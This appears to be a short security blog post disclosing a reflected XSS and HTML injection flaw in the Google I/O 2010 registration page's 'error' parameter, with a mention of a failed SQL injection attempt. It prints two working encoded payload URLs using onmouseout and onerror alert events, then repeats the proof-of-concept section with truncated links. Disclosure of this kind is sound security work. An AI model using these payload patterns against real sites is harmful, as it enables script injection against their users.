"Google I/O brings together thousands of developers for two days of deep technical content, focused on building the next generation of web, mobile, and enterprise applications with Google and open web technologies such as Android, Google Chrome, Google APIs, Google Web Toolkit, App Engine, and more."
Source: here
Get var "error" was vulnerable to XSS/HTML code injection but some tags and javascript events were filtered trying to do more difficult the explotation.
Also i noticed that viewing source code, error var triggered a SQL error, so I tried to make a SQL Injection but no worked.
Proof of concept:
Indirect. Needed user interaction (event JavaScript: onmouseout) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ca%20href=%22http://www.malware.es%22%20onmouseout=%22alert%281%29%22%3EHOLA%20GOOGLE%3C/a%3E
Fig.1: XSS (Indirect) and HTML Injection.
Direct. Not needed user interaction (event JavaScript: onerror) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ch1%3E%3Cimg%20src=%22pepe.jpg%22%20onerror=%22alert%281%29%22%3EHI%20GOOGLE%20SECURITY%20TEAM%20I%27M%20%20ONLY%20TESTING%3C/a%3E%3C/h1%3E
Proof of concept:
Indirect. Needed user interaction (event JavaScript: onmouseout) -> https://www.google-io.com/
Fig.1: XSS (Indirect) and HTML Injection.
Direct. Not needed user interaction (event JavaScript: onerror) -> https://www.google-io.com/
Fig.2: XSS (Direct) and HTML Injection.
Be safe ;)
2 comentarios:
Great!!Thanks for getting everything to work a little better
Be safe :)
Thanks! I do what i can
Publicar un comentario